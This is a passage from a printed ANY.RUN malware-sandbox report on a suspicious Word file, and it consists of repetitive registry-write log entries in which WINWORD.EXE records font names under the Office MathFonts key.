Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Haettenschweiler
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 27/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Harlow Solid Italic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Harrington
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Headline R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGKyokashotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGMaruGothicMPRO
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPKyokashotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGPSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 28/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: HGSeikaishotaiPRO
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSGothicE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSGothicM
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSGyoshotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSKyokashotai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSMinchoB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSMinchoE
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSSoeiKakugothicUB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSSoeiKakupoptai
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HGSSoeiPresenceEB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: High Tower Text
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYGothic-Extra
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYGothic-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYGraphic-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYGungSo-Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYHeadLine-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYMyeongJo-Extra
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 29/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYPMokGak-Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYPost-Light
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYPost-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYShortSamul-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: HYSinMyeongJo-Medium
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Impact
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Imprint MT Shadow
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Informal Roman
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: IrisUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Iskoola Pota
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: JasmineUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Jokerman
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Juice ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: KaiTi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Kalinga
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Kartika
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Khmer UI
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: KodchiangUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Kokila
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Kristen ITC
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 30/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Kunstler Script
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lao UI
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Latha
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Leelawadee
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Levenim MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: LilyUPC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Bright
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Calligraphy
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Console
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Fax
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Handwriting
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Sans
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Sans Typewriter
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Lucida Sans Unicode
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Magic R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Magneto
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Maiandra GD
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Malgun Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Mangal
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 31/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: Marlett
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Matura MT Script Capitals
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Meiryo
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Meiryo UI
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft Himalaya
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft JhengHei
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft New Tai Lue
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft PhagsPa
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft Sans Serif
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft Tai Le
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft Uighur
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft YaHei
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Microsoft Yi Baiti
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MingLiU
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MingLiU_HKSCS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MingLiU_HKSCS-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MingLiU-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Miriam
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Miriam Fixed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Mistral
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 32/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Modern No. 20
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MoeumT R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Mongolian Baiti
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Monotype Corsiva
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MoolBoran
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Mincho
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Outlook
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS PGothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS PMincho
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Reference Sans Serif
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Reference Specialty
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Sans Serif
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS Serif
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MS UI Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MT Extra
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: MV Boli
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Narkisim
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: New Gulim
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Niagara Engraved
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 33/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Niagara Solid
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: NSimSun
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Nyala
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: OCR A Extended
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: OCRB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Old English Text MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Onyx
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Palace Script MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Palatino Linotype
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Papyrus
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Parchment
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Perpetua
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Perpetua Titling MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Plantagenet Cherokee
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Playbill
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: PMingLiU
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: PMingLiU-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Poor Richard
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Pristina
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 34/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: Pyunji R
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Raavi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Rage Italic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Ravie
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Rockwell
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Rockwell Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Rockwell Extra Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Rod
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Sakkal Majalla
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Script MT Bold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe Print
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe Script
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe UI
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe UI Light
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe UI Semibold
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Segoe UI Symbol
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Shonar Bangla
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Showcard Gothic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Shruti
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: SimHei
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 35/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Simplified Arabic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Simplified Arabic Fixed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: SimSun
Value: 0
